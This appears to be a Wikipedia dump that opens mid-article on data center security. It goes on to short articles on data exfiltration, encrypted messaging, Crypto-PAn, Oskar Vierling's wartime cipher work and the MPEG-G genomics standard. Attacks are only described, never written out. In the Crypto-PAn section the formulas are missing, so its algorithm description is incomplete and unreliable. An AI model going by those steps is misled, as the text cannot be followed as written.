vulnerabilities: CodeRed Nimda and SQL Slammer Exploitation of software defaults Many systems are shipped with default accounts and passwords, which are exploited for unauthorized access and theft of information. Common attacks Common attacks include: Scanning or probing: One example of a probe- or scan-based attack is a port scan - whereby "requests to a range of server port addresses on a host" are used, to find "an active port" and then cause harm via "a known vulnerability of that service.". This reconnaissance activity often precedes an attack; its goal is to gain access by discovering information about a system or network. DoS (Denial of service): A denial-of-service attack occurs when legitimate users are unable to access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. This type of attack generates a large volume of data to deliberately consume limited resources such as bandwidth, CPU cycles, and memory blocks. Distributed Denial of Service (DDoS): This kind of attack is a particular case of DoS where a large number of systems are compromised and used as source or traffic on a synchronized attack. In this kind of attack, the hacker does not use only one IP address but thousands of them. thumb|center | 400px Unauthorized access: When someone other than an account owner uses privileges associated to a compromised account to access to restricted resources using a valid account or a backdoor. Eavesdropping: Etymologically, Eavesdropping means Secretly listen to a conversation. In the networking field, it is an unauthorized interception of information (usernames, passwords) that travels on the network. User logons are the most common signals sought. Viruses and worms: These are malicious code that, when executed produce undesired results. Worms are self-replicating malware, whereas viruses, which also can replicate, need some kind of human action to cause damage. Internet infrastructure attacks: This kind of attack targets the critical components of the Internet infrastructure rather than individual systems or networks. Trust exploitation: These attacks exploit the trust relationships that computer systems have to communicate. Session hijacking also known as cookie hijacking: Consists of stealing a legitimate session established between a target and a trusted host. The attacker intercepts the session and makes the target believe it is communicating with the trusted host. Buffer overflow attacks: When a program allocates memory buffer space beyond what it had reserved, it results in memory corruption affecting the data stored in the memory areas that were overflowed. Layer 2 attacks: This type of attack exploit the vulnerabilities of data link layer protocols and their implementations on layer 2 switching platforms. SQL injection: Also known as code injection, this is where input to a data-entry form's, due to incomplete data validation, allows entering harmful input that causes harmful instructions to be executed. Network security infrastructure The network security infrastructure includes the security tools used in data centers to enforce security policies. The tools include packet-filtering technologies such as ACLs, firewalls and intrusion detection systems (IDSs) both network-based and host-based. ACLs (Access Control List) ACLs are filtering mechanisms explicitly defined based on packet header information to permit or deny traffic on specific interfaces. ACLs are used in multiple locations within the Data Center such as the Internet Edge and the intranet server farm. The following describes standard and extended access lists: Standard ACLs: the simplest type of ACL filtering traffic solely based on source IP addresses. Standard ACLs are typically deployed to control access to network devices for network management or remote access. For example, one can configure a standard ACL in a router to specify which systems are allowed to Telnet to it. Standard ACLs are not recommended option for traffic filtering due to their lack of granularity. Standard ACLSs are configured with a number between 1 and 99 in Cisco routers. Extended ACLs: Extended ACL filtering decisions are based on the source and destination IP addresses, Layer 4 protocols, Layer 4 ports, ICMP message type and code, type of service, and precedence. In Cisco routers, one can define extended ACLs by name or by a number in the 100 to 199 range. Firewalls A firewall is a sophisticated filtering device that separates LAN segments, giving each segment a different security level and establishing a security perimeter that controls the traffic flow between segments. Firewalls are most commonly deployed at the Internet Edge where they act as boundary to the internal networks. They are expected to have the following characteristics: Performance: the main goal of a firewall is to separate the secured and the unsecured areas of a network. Firewalls are then post in the primary traffic path potentially exposed to large volumes of data. Hence, performance becomes a natural design factor to ensure that the firewall meets the particular requirements. Application support: Another important aspect is the ability of a firewall to control and protect a particular application or protocol, such as Telnet, FTP, and HTTP. The firewall is expected to understand application-level packet exchanges to determine whether packets do follow the application behavior and, if they do not, do deny the traffic. There are different types of firewalls based on their packet-processing capabilities and their awareness of application-level information: Packet-filtering firewalls Proxy firewalls Stateful firewalls Hybrid firewalls IDSs IDSs are real-time systems that can detect intruders and suspicious activities and report them to a monitoring system. They are configured to block or mitigate intrusions in progress and eventually immunize the systems from future attacks. They have two fundamental components: Sensors: Appliances and software agents that analyze the traffic on the network or the resource usage on end systems to identify intrusions and suspicious activities. IDS management: Single- or multi-device system used to configure and administer sensors and to additionally collect all the alarm information generated by the sensors. The sensors are equivalent to surveillance tools, and IDS management is the control center watching the information produced by the surveillance tools. Layer 2 security Cisco Layer 2 switches provide tools to prevent the common Layer 2 attacks (Scanning or Probing, DoS, DDoS, etc.). The following are some security features covered by the Layer 2 Security: Port Security ARP Inspection Private VLANs Private VLANs and Firewalls Security measures The process of securing a data center requires both a comprehensive system-analysis approach and an ongoing process that improves the security levels as the Data Center evolves. The data center is constantly evolving as new applications or services become available. Attacks are becoming more sophisticated and more frequent. These trends require a steady evaluation of security readiness. A key component of the security-readiness evaluation is the policies that govern the application of security in the network including the data center. The application includes both the design best practices and the implementation details. As a result, security is often considered as a key component of the main infrastructure requirement. Since a key responsibility of the data centers is to make sure of the availability of the services, data center management systems often consider how its security affects traffic flows, failures, and scalability. Due to the fact that security measures may vary depending on the data center design, the use of unique features, compliance requirements or the company's business goals, there is no set of specific measures that cover all possible scenarios. There exist in general two types of data center security: physical security and virtual security. Physical security The physical security of a data center is the set of protocol built-in within the data center facilities in order to prevent any physical damage to the machines storing the data. Those protocols should be able to handle everything ranging from natural disasters to corporate espionage to terrorist attacks. To prevent physical attacks, data centers use techniques such as: CCTV security network: locations and access points with 90-day video retention. 24×7 on-site security guards, Network operations center (NOC) Services and technical team Anti-tailgating/Anti-pass-back turnstile gate. Only permits one person to pass through after authentication. Single entry point into co-location facility. Minimization of traffic through dedicated data halls, suites, and cages. Further access restriction to private cages Three-factor authentication SSAE 16 compliant facilities. Checking the provenance and design of hardware in use Reducing insider risk by monitoring activities and keeping their credentials safe Monitoring of temperature and humidity Fire prevention with zoned dry-pipe sprinkler Natural disaster risk-free locations Virtual security Virtual security is security measures put in place by the data centers to prevent remote unauthorized access that will affect the integrity, availability or confidentiality of data stored on servers. Virtual or network security is a hard task to handle as there exist many ways it could be attacked. The worst part of it is that it is evolving years after years. For instance, an attacker could decide to use a malware (or similar exploits) in order to bypass the various firewalls to access the data. Old systems may as well put security at risk as they do not contain modern methods of data security. Virtual attacks can be prevented with techniques such as Heavy data encryption during transfer or not: 256-bit SSL encryption for web applications.1024-bit RSA public keys for data transfers. AES 256-bit encryption for files and databases. Logs auditing activities of all users. Secured usernames and passwords: Encrypted via 256-bit SSL, requirements for complex passwords, set up of scheduled expirations, prevention of password reuse. Access based on the level of clearance. AD/LDAP integration. Control based on IP addresses. Encryption of session ID cookies in order to identify each unique user. Two-factor authentication availability. Third party penetration testing performed annually Malware prevention through firewalls and automated scanner References Computer network security Data breaches Data centers Data security Information management
57810908
https://en.wikipedia.org/wiki/Data%20exfiltration
Data exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. Since the year 2000, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world. Types of exfiltrated data In some data exfiltration scenarios, a large amount of aggregated data may be exfiltrated. However, in these and other scenarios, it is likely that certain types of data may be targeted. Types of data that are targeted includes: Usernames, associated passwords, and other system authentication related information Information associated with strategic decisions Cryptographic keys Personal financial information Social security numbers and other personally identifiable information (PII) Mailing addresses United States National Security Agency hacking tools Techniques Several techniques have been used by malicious actors to carry out data exfiltration. The technique chosen depends on a number of factors. If the attacker has or can easily gain physical or privileged remote access to the server containing the data they wish to exfiltrate, their chances of success are much better than otherwise. For example, it would be relatively easy for a system administrator to plant, and in turn, execute malware that transmits data to an external command and control server without getting caught. Similarly, if one can gain physical administrative access, they can potentially steal the server holding the target data, or more realistically, transfer data from the server to a DVD or USB flash drive. In many cases, malicious actors cannot gain physical access to the physical systems holding target data. In these situations, they may compromise user accounts on remote access applications using manufacturer default or weak passwords. In 2009, after analyzing 200 data exfiltration attacks that took place in 24 countries, SpiderLabs discovered a ninety percent success rate in compromising user accounts on remote access applications without requiring brute-force attacks. Once a malicious actor gains this level of access, they may transfer target data elsewhere. Additionally, there are more sophisticated forms of data exfiltration. Various techniques can be used to conceal detection by network defenses. For example, Cross Site Scripting (XSS) can be used to exploit vulnerabilities in web applications to provide a malicious actor with sensitive data. A timing channel can also be used to send data a few packets at a time at specified intervals in a way that is even more difficult for network defenses to detect and prevent. Preventive measures A number of things can be done to help defend a network against data exfiltration. Three main categories of preventive measures may be the most effective: Preventive Detective Investigative One example of detective measures is to implement intrusion detection and prevention systems and regularly monitor network services to ensure that only known acceptable services are running at any given time. If suspicious network services are running, investigate and take the appropriate measures immediately. Preventive measures include the implementation and maintenance of access controls, deception techniques, and encryption of data in process, in transit, and at rest. Investigative measures include various forensics actions and counter intelligence operations. References External sources http://www.ists.dartmouth.edu/library/293.pdf https://www.scmagazine.com/data-exfiltration-defense/article/536744/ Data exfiltration blogs, news and reports Data security Theft
57877532
https://en.wikipedia.org/wiki/MDaemon
MDaemon
MDaemon Email Server is an email server application with groupware functions for Microsoft Windows, first released by Alt-N Technologies in 1996. Features Mdaemon supports multiple client-side protocols, including IMAP, POP3, SMTP/MSA, webmail, CalDAV, CardDAV, and optionally ActiveSync for mobile clients and Outlook, and its Connector for Outlook add-on. MDaemon's features include a built-in spam filter with Heuristic and Bayesian analysis, SSL and TLS encryption, client-side and server-side email and attachment encryption, public and shared folder support, mailing list, and support for sharing of groupware data (calendar, contacts, tasks & notes). It is also the basis for MDaemon Tech's Security Gateway for Email Servers. According to SecuritySpace.com's Mail (MX) Server Survey from May 2020, MDaemon provides approximately 7.6‰ of all known Internet mail servers, the fifth largest installation base from all identified servers. References Windows Internet software Proprietary software Message transfer agents Groupware
58011440
https://en.wikipedia.org/wiki/Runa%20Sandvik
Runa Sandvik
Runa Sandvik is a computer security expert, known as a proponent of strong encryption. She was hired as The New York Times senior director of information security in March 2016 and is a proponent of a smartphone messaging application Signal. Personal life She acquired her first computer when she was fifteen years old. She studied computer science at the Norwegian University of Science and Technology. In 2014 Sandvik married Michael Auger, and the pair made their home in Washington, D.C. Tor anonymity network Sandvik was an early developer of the Tor anonymity network, a cooperative facility that helps individuals obfuscate the internet protocol they are using to access the internet. Freedom of the Press Foundation Sandvik is a technical advisor to the Freedom of the Press Foundation. Black Hat Europe She serves on the review board of Black Hat Europe. Interviewed Edward Snowden Sandvik interviewed Edward Snowden in May 2014. Freedom of Information Access requests In February 2015 Sandvik documented her efforts to retrieve information about herself through Freedom of Information Act requests. Demonstrated how smart rifles with remote access can be remotely hacked Sandvik, and her husband, Auger, demonstrated how smart rifles with remote access can be remotely hacked. The $13,000 TrackingPoint sniper rifle is equipped with an embedded linux computer. According to Wired magazine, when used according to its specifications, the aiming computer can enable a novice to hit remote targets that would otherwise require a skilled marksman. However the manufacturers designed the aiming computer with WiFi capabilities, so the shooter could upload video of their shots. Sandvik and Auger found they could initiate a Unix shell command line interpreter, and use it to alter parameters the aiming computer relies on, so that it will always miss its targets. They found that a knowledgeable hacker could use the shell to acquire root access. Acquiring root access allowed an interloper to erase all the aiming computer's software—"bricking" the aiming computer. Initiatives at the New York Times Sandvik led efforts to make The New York Times a Tor Onion service, allowing Times employees and readers to access the newspaper's site in ways that impede intrusive government monitoring. References External links Snowden interview Sandvik, Runa People associated with computer security
58027283
https://en.wikipedia.org/wiki/Column%20level%20encryption
Column level encryption
Column level encryption is a type of database encryption method that allows user to select specific information or attributes to be encrypted instead of encrypting the entire database file. To understand why column level encryption is different from other encryption methods like file level encryption, disk encryption, and database encryption, a basic understanding of encryption is required. Generally, when data are being collected and stored as records, those records will appear in a tabular format in rows in the database with each rows logging specific attributes. Some data can be more sensitive than others, for example, data of birth, social security number, home address, etc., which can act as a personal identification. In order to ensure that these private information is transferred and stored securely, data goes through encryption, which is the process of encoding plaintext into ciphertext. Non-designated readers or receivers will not be able to read the data without the decryption key. Another example to illustrate this concept is, given a database stores client's phone numbers. The set of phone numbers will appear to most readers as gibberish alphanumerical text with a mix of symbols, totally useless to those who do not have access privilege to view the data in plaintext (original form). Because not all stored data are always sensitive and important, column level encryption was created to allow users the flexibility in choosing what sort of attributes should or should not be encrypted. This is to minimize performance disruption when executing crypto algorithms by moving data in and out of devices. Application and advantages The technology has been adopted by many encryption software companies around the world, including IBM, MyDiamo (Penta Security), Oracle and more. Column level encryption does not store the same encryption key like table encryption does but rather separate keys for each column. This method minimizes the probability of unauthorized access. Advantages of column-level encryption Advantages of column-level encryption: Flexibility in data to encrypt. The application can be written to control when, where, by whom, and how data is viewed Transparent encryption is possible More secure as each column can have its own unique encryption key within the database Encryption is possible when data is active and not just “at rest” Retrieval speed is maintained because there's less encrypted data References Cryptographic software
58056697
https://en.wikipedia.org/wiki/David%20Cornstein
David Cornstein
David Bernard Cornstein (born August 17, 1938) is an American businessman and diplomat who served as the United States Ambassador to Hungary between 2018 and 2020. Cornstein made a career in the gambling, jewelry, and telemarketing industries. Early life and education Cornstein was born in New York City on August 17, 1938. As the only child of Irwin, who worked in the rug business, and Fanny, a schoolteacher, Cornstein grew up in the city. His maternal grandparents immigrated to the U.S. from Hungary. Cornstein attended P.S.168 in The Bronx and later attended Horace Mann School, graduating in 1956. He earned a B.A. in 1960 from Lafayette College in Easton, Pennsylvania, where he is still a donor and part of the university's Marquis Society today. He subsequently earned an M.B.A. from New York University (NYU). Cornstein then served as a cook in the Army Reserve. Career Cornstein started his career while studying at NYU. He opened a jewelry counter in a J. C. Penney store in Long Island and later expanded the operations into a company called Tru-Run, selling jewelry in department stores throughout the U.S. Cornstein served as the president, chief executive officer, and a director. The company bought a similar firm, Seligman and Latz, in 1985 and Finlay Fine Jewelry for $217 million in 1988. Cornstein formed a new holding company, Finlay Enterprises, where he became president and chief executive in December 1988 and continued as a director of Finlay Fine Jewelry. The company continued to grow through the economic downturn in 1989, and in the 1990s expanded into Europe. In January 1999, Cornstein left Finlay as acting chief executive. He was appointed to the New York Off-Track Betting Commission in 1994 and eventually became its chairman. He promoted ideas like televising races live and an 800 telephone number for gamblers to wager. Cornstein contemplated runs for Mayor of New York City in 1985 and 1991. He briefly declared himself a candidate for New York State Comptroller in 2001. Cornstein later dropped out of the race after Republicans leaders backed the eventual candidate, John Faso. In September 1999, he was named chairman of TeleHubLink, a telemarketing company that produced wireless encryption products. He had been a director of What A World! since July 1993, before it changed its name to TeleHub. His connection with TeleHubLink proved problematic when, in April 2001, Eliot Spitzer filed a lawsuit against TeleHubLink for violating consumer protection laws. The State argued:Using the name Triple Gold Benefits, Telehublink Inc.'s telemarketers promised thousands of consumers across the nation that, for an advance fee of over $200, the consumers would receive a low rate, general purpose Visa or MasterCard credit card. In fact, consumers who paid the advance fee did not receive a credit card. Instead, Telehublink sent them a 'discount benefits package' consisting of generally worthless items such as an application for a credit card. In January 2003, the Third Department of the New York State Supreme Court, Appellate Division, upheld a 2001 ruling that "had halted the scam and awarded restitution to victimized consumers." Cornstein was previously the chairman of Pinnacle Advisors Ltd., in addition to being CEO, president, and chairman emeritus of Finlay Enterprises. In 2006, Cornstein was elected chairman of the board of the Jewelers' Security Alliance. New York Governor George Pataki gave Cornstein the chairmanship of the New York State Olympic Games Commission as it prepared a bid for the 2012 games, which eventually went to London. U.S. Ambassador to Hungary A life-long Republican, Cornstein has been a frequent contributor to Republican politicians, although he has also donated to the campaigns of Democrats Chuck Schumer and Cory Booker. On February 13, 2018, United States President Donald Trump nominated Cornstein to be U.S. Ambassador to Hungary. Cornstein was a long-time friend of Trump's. He was a member of Trump's golf club in West Palm Beach. As Ambassador, Cornstein vocally defended the government of Viktor Orbán. According to The Washington Post, Cornstein sought to "charm" rather than shame Orbán. According to some critics, under Orbán's premiership, Hungary underwent democratic backsliding, becoming increasingly authoritarian. Cornstein told Hungarian media that he had seen no evidence of this authoritarian shift, but according to reports of "mounting evidence" that the government had infringed on human rights in Hungary. The Hungarian government and its defenders gleefully repeated Cornstein's remarks. In a 2019 interview with The Atlantic's Franklin Foer, Cornstein was asked about Orbán's own description of his administration as an "illiberal democracy", Cornstein said, "I can tell you, knowing [Trump] for a good 25 or 30 years, that he would love to have the situation that Viktor Orbán has, but he doesn't." In September 2018, Cornstein claimed that he had reached an agreement with Orbán that Central European University, a notable American university in Budapest, would be allowed to stay in Hungary. However, in December 2018, Central European University alleged it had been kicked out of Hungary in what The Washington Post described as "a dark waypoint in Hungary's crackdown on civil society and an ominous sign for U.S. institutions operating under autocratic regimes worldwide." During the same week that Central European University chose to leave Hungary, Cornstein described Orbán as a "friend" and criticized George Soros, who founded the university. Cornstein stated that Soros had a crazed hatred of Orbán, which led CEU not to make concessions to stay in Hungary. Cornstein mocked the size of Central European University, said that the departure of CEU "doesn't have anything to do with academic freedom", and mused why "this has become such an important subject in the world". Asked by The Atlantic's Franklin Foer if US relations with Hungary would suffer as a result of the CEU ouster, Cornstein answered "not really." When Cornstein gave his answer, his aide asked him to step out of the room; Cornstein told Foer, "I'm in trouble." In October 2019, The New York Times published a story documenting controversies in Cornstein's tenure as U.S. Ambassador to Hungary, highlighting his close support of Orbán's policies and unchecked power, as well as extravagant spending on parties. On September 15, 2020, the U.S. Embassy in Budapest announced that Cornstein informed President Trump and Hungarian Foreign Minister Péter Szijjártó that he would end his service as U.S. Ambassador to Hungary effective November 1, 2020. In doing so, the ambassador said that “it has been an honor and a privilege to serve the country that I love in a country that I have come to cherish." References Further reading 1938 births Ambassadors of the United States to Hungary Horace Mann School alumni Lafayette College alumni New York University alumni Living people New York (state) Republicans Businesspeople from New York City American jewellers American people of Hungarian-Jewish descent Jewish American government officials 21st-century American Jews
58216843
https://en.wikipedia.org/wiki/Spyros%20Magliveras
Spyros Magliveras
Spyros Simos Magliveras (born 6 September 1938 in Athens)<ref>biographical information from American Men and Women of Science, Vol. 5 . Thomson Gale, Detroit 2004, .</ref> is a Greek-born American mathematician and computer scientist. Biography Magliveras graduated from the University of Florida with a bachelor's degree in electrical engineering in 1961 and a master's degree in mathematics in 1963. He was from 1963 to 1964 an instructor of mathematics at Florida Presbyterian College and from 1964 to 1968 a teaching fellow in mathematics at the University of Michigan, as well as from 1965 to 1968 a programming analyst and a systems analyst at the University of Michigan Institute for Social Research. He received his PhD in mathematics from the University of Birmingham, UK in 1970 with thesis advisor Donald Livingstone and thesis The subgroup structure of the Higman-Sims simple group. At the State University of New York at Oswego, he was from 1970 to 1973 an assistant professor and from 1973 to 1978 an associate professor. From 1978 to 2000 he was a professor of mathematics and computer science at the University of Nebraska-Lincoln, retiring as professor emeritus in 2000. Since 2000 he has been a professor at Florida Atlantic University (FAU). He was the director of FAU's Center for Cryptology and Information Security from 2003 to 2013, and since 2013 he has been the center's associate director. He has been a visiting professor at the University of Birmingham (1984/85), at the University of Waterloo (1999), at the Sapienza University of Rome (two months in 2000), and at the University of Western Australia (two months in 2000). Magliveras does research on combinatorial designs, permutation groups, finite geometries, encryption of data (cryptography), and data security. In 2001 he received the Euler Medal. He is a co-author of the 2007 book Secure group communications over data networks''. Magliveras is married since 1961 and has two children. References External links Homepage at Florida Atlantic University 20th-century American mathematicians 21st-century American mathematicians American people of Greek descent Combinatorialists University of Florida alumni Alumni of the University of Birmingham University of Nebraska–Lincoln faculty Florida Atlantic University faculty 1938 births Living people University of Michigan fellows
58400960
https://en.wikipedia.org/wiki/Element%20%28software%29
Element (software)
Element (formerly Riot and Vector) is a free and open-source software instant messaging client implementing the Matrix protocol. Element supports end-to-end encryption, groups and sharing of files between users. It is available as a web application, as desktop apps for all major operating systems and as a mobile app for Android and iOS. History Element was originally known as Vector when it was released from beta in 2016. The app was renamed to Riot in September of the same year. In 2016 the first implementation of the Matrix end-to-end encryption was implemented and rolled out as a beta to users. In May 2020, the developers announced enabling end-to-end encryption by default in Riot for new non-public conversations. In April 2019, a new application was released on the Google Play Store in response to cryptographic keys used to sign the Riot Android app being compromised. In July 2020, Riot was renamed to Element. In January 2021, Element was briefly suspended from Google Play Store in response to a report of user-submitted abusive content on Element's default server, matrix.org. Element staff rectified the issue and the app was brought back to the Play Store. Technology Element is built with the Matrix React SDK, which is a React-based software development kit to ease the development of Matrix clients. Element is reliant on web technologies and uses Electron for bundling the app for Windows, MacOS and Linux. The Android and iOS clients are developed and distributed with their respective platform tools. On Android the app is available both in the Google Play Store and the free-software only F-Droid Archives, with minor modifications. For instance, the F-Droid version does not contain the proprietary Google Cloud Messaging plug-in. Features Element is able to bridge other communications into the app via Matrix, including IRC, Slack, Telegram, Jitsi Meet and others. Also, it integrates voice and video peer-to-peer and group chats via WebRTC. Element supports end-to-end encryption (E2EE) of both one-to-one and group chats. Reception Media compared Element to Slack, WhatsApp and other instant messaging clients. In 2017, German computer magazine Golem.de called Element (then Riot) and Matrix server "mature" and "feature-rich", but criticized its key authentication at the time to be not user-friendly for communicatees owning multiple devices. A co-founder of the project, Matthew Hodgson, assured the key verification process was a "placeholder" solution to work on. In 2020, Element added key cross-signing to make the verification process simpler, and enabled end-to-end encryption by default. See also Matrix IRC Rich Communication Services (RCS) Session Initiation Protocol (SIP) XMPP References External links Communication software Cross-platform software Free and open-source Android software Free instant messaging clients Mobile instant messaging clients IOS software Linux software macOS software Windows software
58428725
https://en.wikipedia.org/wiki/Crypto-PAn
Crypto-PAn
Crypto-PAn (Cryptography-based Prefix-preserving Anonymization) is a cryptographic algorithm for anonymizing IP addresses while preserving their subnet structure. That is, the algorithm encrypts any string of bits to a new string , while ensuring that for any pair of bit-strings which share a common prefix of length , their images also share a common prefix of length . A mapping with this property is called prefix-preserving. In this way, Crypto-PAn is a kind of format-preserving encryption. The mathematical outline of Crypto-PAn was developed by Jinliang Fan, Jun Xu, Mostafa H. Ammar (all of Georgia Tech) and Sue B. Moon. It was inspired by the IP address anonymization done by Greg Minshall's TCPdpriv program circa 1996. Algorithm Intuitively, Crypto-PAn encrypts a bit-string of length by descending a binary tree of depth , one step for each bit in the string. Each of the binary tree's non-leaf nodes has been given a value of "0" or "1", according to some pseudo-random function seeded by the encryption key. At each step of the descent, the algorithm computes the th bit of the output by XORing the th bit of the input with the value of the current node. The reference implementation takes a 256-bit key. The first 128 bits of the key material are used to initialize an AES-128 cipher in ECB mode. The second 128 bits of the key material are encrypted with the cipher to produce a 128-bit padding block . Given a 32-bit IPv4 address , the reference implementation performs the following operation for each bit of the input: Compose a 128-bit input block . Encrypt with the cipher to produce a 128-bit output block . Finally, XOR the th bit of that output block with the th bit of , and append the result — — onto the output bitstring. Once all 32 bits of the output bitstring have been computed, the result is returned as the anonymized output which corresponds to the original input . The reference implementation does not implement deanonymization; that is, it does not provide a function such that . However, decryption can be implemented almost identically to encryption, just making sure to compose each input block using the plaintext bits of decrypted so far, rather than using the ciphertext bits: . The reference implementation does not implement encryption of bitstrings of lengths other than 32; for example, it does not support the anonymization of 128-bit IPv6 addresses. In practice, the 32-bit Crypto-PAn algorithm can be used in "ECB mode" itself, so that a 128-bit string might be anonymized as . This approach preserves the prefix structure of the 128-bit string, but does leak information about the lower-order chunks; for example, an anonymized IPv6 address consisting of the same 32-bit ciphertext repeated four times is likely the special address ::, which thus reveals the encryption of the 32-bit plaintext 0000:0000:0000:0000. In principle, the reference implementation's approach (building 128-bit input blocks ) can be extended up to 128 bits. Beyond 128 bits, a different approach would have to be used; but the fundamental algorithm (descending a binary tree whose nodes are marked with a pseudo-random function of the key material) remains valid. Implementations Crypto-PAn's C++ reference implementation was written in 2002 by Jinliang Fan. In 2005, David Stott of Lucent made some improvements to the C++ reference implementation, including a deanonymization routine. Stott also observed that the algorithm preserves prefix structure while destroying suffix structure; running the Crypto-PAn algorithm on a bit-reversed string will preserve any existing suffix structure while destroying prefix structure. Thus, running the algorithm first on the input string, and then again on the bit-reversed output of the first pass, destroys both prefix and suffix structure. (However, once the suffix structure has been destroyed, destroying the remaining prefix structure can be accomplished far more efficiently by simply feeding the non-reversed output to AES-128 in ECB mode. There is no particular reason to reuse Crypto-PAn in the second pass.) A Perl implementation was written in 2005 by John Kristoff. Python and Ruby implementations also exist. Versions of the Crypto-PAn algorithm are used for data anonymization in many applications, including NetSniff and CAIDA's CoralReef library. References Advanced Encryption Standard Symmetric-key algorithms
58443634
https://en.wikipedia.org/wiki/Oskar%20Vierling
Oskar Vierling
Oskar Walther Vierling (* January 24, 1904 in Straubing, † 1986) was a German physicist, inventor, entrepreneur and professor in high-frequency technology. Vierling was an important inventor and engineer of electronic and electro-acoustic instruments between the 1930s and 1950s. Life Oskar Vierling attended school in Regensburg, and graduated with the Obersekundareife. In 1925 he graduated as an engineer at the Technische Hochschule Nürnberg in Nuremberg in Nuremberg, and later attending the Telegrafen technische Reichsamt in Berlin. Vierling then took a position at the Heinrich Hertz Institute. Fritz Sennheiser was his student and joined him in the founding of the high-frequency institute of the University of Hannover. Vierling was married and had two sons. The children took over the kind of Vierling Group. Career In 1929, Vierling along with Walther Nernst, created the Neo-Bechstein Electric Grand piano design, that divided the strings into groups of five, with their own electrostatic pickups. With amplification the strings were thinner and shorter. The Neo-Bechstein piano was eventually manufactured by the C. Bechstein piano factory company in 1932 after completion of development, but proved a commercial disappointment due to financial difficulties in the Bechstein company. In 1932, Vierling worked with Benjamin Miessner to design and invent the Elektrochord piano, for the August Förster company. The Elektrochord was one of the first electric pianos, whereupon the vibrations of the struck string by the hammer, were electronically recorded and then amplified. The sound was controllable in that it was configurable to provide a range from a salon grand piano to a full concert grand piano. In 1925, Vierling was promoted to Phd with a thesis titled, The Electroacoustic Piano. In 1938, Vierling was promoted to a full professorship at the Technical University of Hannover, and founded an Institute for the study of high-frequency technology and electro-acoustics. Wehrmacht In 1941, he was commissioned by the Wehrmacht to create the Vierling Group. For this high frequency and electroacoustic armament research, Vierling built the research laboratory Feuerstein Castle in Ebermannstadt, which was located centrally in Germany and disguised as a Franconian castle and hospital. While at the Feuerstein Castle, Vierling developed the first directional radio lines and tested and developed the control for the acoustically controlled G7es torpedo, Torpedo Wren () and later Torpedo Vulture (. Vierling worked with Erich Hüttenhain at the OKW/Chi, Werner Liebknecht who was Director of Engineering at Referat Wa Prüf 7 of the Waffenamt and Erich Fellgiebel Chief of Wehrmacht communications. Vierling worked with Hüttenhain, Liebknecht and Fellgiebel on the Hazardo machine. This machine was supposed to generate random sequence of teleprinter letters on a normal teleprinter tape. Such a key-hole tape could not be easily duplicated by also directly used for telex encryption or for deriving statistical letters or numerical sequences. Vierling also worked on the improvement of the encryption machine, Lorenz SZ 42. Vierling later worked on the testing of the acoustic ignition of mines, and collaborated in the invention of an anti-radar coating for submarines, with the code name chimney sweep. In addition, Vierling and his team developed radios and electric calculators. Another area that Vierling and his team were working on, was ciphony. Of the six methods the lab developed during the period of World War II to achieve secure voice, none were found to be successful and Vierling failed to develop a secure voice system. Vierling had an ambivalent relationship to Nazism. On the one hand he was a member of the Nazi party, on the other hand he worked largely independently and was negative in the party apparatus as he was not regularly present at party meetings. After 1945 During the post war period, Vierling made his intelligence technology, including Covert listening device, available for use to the Gehlen Organization, that enabled his group to survive. In July 1950, the group working on the Hazardo device, moved in secrecy to Kransberg Castle to continue work. In October 1950, the Hazardo produced the first keyhole strip. With the completion of the device, a separate four-person working group called Schlüsselmittelherstllung was formed to exploit the device. Between 1949 and 1955 Vierling taught as a Professor of physics at the philosophical Theological College at the University of Bamberg. The first test of the Deutsche Bundespost with transistors and later on microprocessor-based systems for mail delivery were based on Vierling work. Awards and honours 1980: Order of merit 1st class of the Federal Republic of Germany 1985: Bavarian Order of Merit References External links Vierling group 1904 births 1986 deaths 20th-century German physicists Instrument makers People from Straubing Officers Crosses of the Order of Merit of the Federal Republic of Germany
58483651
https://en.wikipedia.org/wiki/MPEG-G
MPEG-G
MPEG-G (ISO / IEC 23092) is an ISO/IEC standard designed for genomic information representation by the collaboration of the ISO/IEC JTC 1/SC 29/WG 9 (MPEG) and ISO TC 276 "Biotechnology" Work Group 5. The goal of the standard is to provide interoperable solutions for data storage, access, and protection across different possible implementations for data information generated by high-throughput sequencing machines and their subsequent processing and analysis. The standard is composed of different parts, each one addressing a specific aspect, such as compression, metadata association, Application Programming Interfaces (APIs), and a reference software for data decoding. Together with the reference decoder software, commercial and open source implementations started to be available in 2019, covering progressively more of the published parts of the standard. Background The advent of high-throughput sequencing (HTS) technologies has revolutionized the field of quantitative biology. Availability of large collections of genomic information has now entered everyday practice and has become a cornerstone of a number of disciplines, ranging from biological research to personalized medicine in the clinic. At the moment, genomic information is mostly exchanged through a variety of data formats, such as FASTA/FASTQ for unaligned sequencing reads and SAM/BAM/CRAM for aligned reads. Biological studies typically produce genomic annotation data such as mapping statistics, quantitative browser tracks, variants, genome functional annotations, gene expression data, and Hi-C contact matrices. These diverse types of downstream genomic data are currently represented in different formats such as VCF, BED, GFF, etc., sometimes with loosely defined semantics.The ISO/IEC 23092 (MPEG-G) standard aims to provide a unified format for the efficient representation and compression of such diverse data, both for file storage and data transport. In order to do that, the standard is divided in several parts. Structure of the standard The MPEG-G standard utilizes technology and data representation architectures previously validated in the field of digital media. They allow to compress and transport genome sequencing data even in complex scenarios, for instance when access is needed to large amounts of possibly distributed data, or when part of the data needs to be encrypted for privacy reasons. Conceptually, such requirements lead to the definition of a number of mutually interrelated mechanisms, which are summarized in the following list: Data format and compression Data streaming Compressed file concatenation Incremental update of sequencing data and metadata Selective access to compressed data, e.g. fast queries by genomic range Metadata association Enforcement of privacy rules Selective encryption of data and metadata Annotation and linkage of genomic segments. In turn, some of these topic have been collected together, in order to make the standard easier to understand and implement. As a result, the ISO/IEC 23092 standard is physically structured as a series of separate document, as follows: ISO/IEC 23092-1 MPEG-G Part 1 To be defined. ISO/IEC 23092-2 MPEG-G Part 2 To be defined. ISO/IEC 23092-3 MPEG-G Part 3 ISO/IEC 23092-3 specifies information metadata, protection metadata, auxiliary fields, SAM interoperability and programming interfaces of genomic information. It defines: Metadata storage and interpretation for the different encapsulation levels as specified in ISO/IEC 23092-1; Protection elements providing confidentiality, integrity and privacy rules at the different encapsulation levels specified in ISO/IEC 23092-1; How to associate auxiliary fields to encoded reads; Mechanisms for backward compatibility with existing SAM content, and exportation to this format; Interfaces to access genomic information coded in compliance with ISO/IEC 23092-1 and ISO/IEC 23092-2. 